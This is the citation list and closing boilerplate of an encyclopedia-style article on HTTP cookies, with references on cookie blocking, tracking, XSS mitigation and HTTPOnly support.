  21. ^ "Clear Personal Information: Delete cookies". Google Chrome Help. Google. Retrieved 2009-01-04.
  22. ^ CBS News. CIA Caught Sneaking Cookies. March 20, 2002.
  23. ^ The Associated Press. Spy Agency Removes Illegal Tracking Files. December 29, 2005
  24. ^ "Guichett - 32002L0058 -". eur-lex.europa.eu. Retrieved 2009-02-18.
  25. ^ "Cookie Settings for Opera 9". OperaWiki.info. Retrieved 2008-01-20.
  26. ^ Pegoraro, Rob (July 17, 2005). "How to Block Tracking Cookies". Washington Post. p. F07. Retrieved 2009-01-04.
  27. ^ Taco.Dubfire.net, TACO, the Targeted Advertising Cookie Opt-Out Firefox extension
  28. ^ Tilkov, Stefan (July 02, 2008). "REST Anti-Patterns". InfoQ. Retrieved 2009-01-04. {{cite web}}: Check date values in: |date= (help)
  29. ^ HTTP State Management.
  30. ^ "Warning of webmail wi-fi hijack". BBC News. August 3, 2007.
  31. ^ "Can you show me what XSS cookie theft looks like?" (except from the Cgisecurity Cross-Site Scripting FAQ).
  32. ^ a b Microsoft, Mitigating Cross-site Scripting With HTTP-only Cookies.
  33. ^ "Who developed HTTPOnly? When?". OWASP. Retrieved 2009-01-04.
  34. ^ "Session set cookie params". PHP Manual. PHP. Retrieved 2009-01-04.
  35. ^ Microsoft, Defend Your Code with Top Ten Security Tips Every Developer Must Know.
  36. ^ "Browsers Supporting HTTPOnly". OWASP. Retrieved 2009-01-04.
  37. ^ "Google expires cookies sooner in minor privacy concession". Cnet. June 16, 2007. Retrieved 2007-11-07.
  38. ^ ThomasFrank.se
  39. ^ SSRN.com
  40. ^ Introduction to Persistence, MSDN
  41. ^ Microsoft.com

This article is based on material taken from the Free On-line Dictionary of Computing prior to 1 November 2008 and incorporated under the "relicensing" terms of the GFDL, version 1.3 or later.

Listen to this article
(2 parts, 1 hour and 1 minute)
Spoken Wikipedia icon
These audio files were created from a revision of this article dated
Error: no date provided
, and do not reflect subsequent edits.

Template:Link FA